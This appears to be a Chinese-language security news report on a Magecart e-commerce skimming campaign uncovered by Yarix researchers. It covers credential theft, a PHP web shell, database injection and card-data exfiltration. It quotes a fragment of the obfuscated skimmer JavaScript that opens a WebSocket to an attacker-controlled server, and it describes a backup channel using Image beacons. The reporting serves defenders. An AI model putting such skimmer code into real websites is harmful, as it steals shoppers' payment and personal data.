一种复杂的 Magecart 攻击活动已被发现，其目标指向电子商务平台，攻击者使用经过高度混淆的 JavaScript 代码来获取敏感的支付信息。

这一最新的 Magecart 数据窃取攻击变体展现出了先进的技术，既能在结账过程中无缝获取信用卡详细信息，又能有效躲避检测。

被注入到受攻击的电子商务网站中的恶意代码在后台悄然运行，在毫无防备的客户与攻击者的命令控制服务器之间建立起了一座无形的桥梁。

此次攻击遵循多阶段入侵模式，一开始是未经授权访问网站的后端系统。

根据调查结果，攻击者最初是通过盗取管理员凭证来实施攻击的，这些凭证往往是通过部署在受害者系统上的信息窃取恶意软件获得的。

这些凭证为攻击者提供了启动攻击序列所需的特权访问权限，使他们能够绕过标准的安全措施，并在目标基础设施中站稳脚跟。

Yarix 的研究人员在对受攻击的电子商务平台进行取证调查时发现了这一特定类型的 Magecart 攻击。

他们的分析显示，一旦攻击者获得了管理员访问权限，他们会迅速上传一个定制的 PHP 网页后门程序，以保持持久访问权限，这样即使最初的入侵被发现，他们也能继续控制服务器。

被发现的这个网页后门在结构上与开源的 P.A.S. Fork v. 1.4 工具相似，但包含了针对此次攻击活动的特定自定义修改内容。

这些攻击的影响不仅仅局限于经济损失，还会对受影响的商家造成严重的声誉损害，并削弱消费者的信任。

被盗取的数据通常包括完整的信用卡信息（卡号、有效期、安全码）、个人信息（姓名、地址、电子邮件），而且往往还包括配送信息 —— 基本上为攻击者提供了进行欺诈性交易或身份盗窃所需的一切信息。

攻击的进展分为四个不同的阶段：首先利用窃取的凭证进行后端访问，然后安装网页后门程序以实现持续控制，接着通过注入混淆代码来毒害数据库，最后进入信用卡信息窃取阶段，在此阶段，客户的支付信息会被获取并泄露出去。

这种有条不紊的攻击方式展示了这些威胁行为者所采用的复杂策略。

JavaScript 混淆与数据泄露技术

恶意的 JavaScript 代码采用了复杂的混淆技术来躲避检测。原始代码看起来就像是一堆难以理解的十六进制值、变量赋值和函数调用的杂乱组合，而且没有缩进格式。

一个名为 “chameleon” 的关键函数是混淆策略的核心，它在执行过程中会动态地重新定义自身，并与立即调用函数表达式（IIFE）协同工作，进一步增加了代码分析的难度。

createWebSocket=(randomString=genRandomString())=>{

if(Mp2mK1sl_Socket!==![] || localStorage[‘getItem’](‘XsuHCYmfbgVSRFVx7SHRnU7DfapjFpaf’)===null)

return![];

Mp2mK1sl_Socket=new WebSocket(‘wss://’+JSON[‘parse’](localStorage[‘getItem’](‘XsuHCYmfbgVSRFVx7SHRnU7DfapjFpaf’))[‘map’](function(_Oxe38f46) {

return String[‘fromCharCode’](_Oxe38f46);

})[‘join’](”)+’?token=’+randomString)}

数据泄露机制采用了两种不同的渠道来确保数据成功被盗取。

主要方法是利用 WebSocket 与攻击者控制的服务器进行实时通信，而次要技术则是利用 Image 对象创建包含已编码信用卡数据的不可见请求。

这种创新的双通道方法增加了攻击者成功提取数据的机会，即使网络监控系统可能检测并阻止了其中一种数据泄露方法，他们仍有可能通过另一种方法得逞。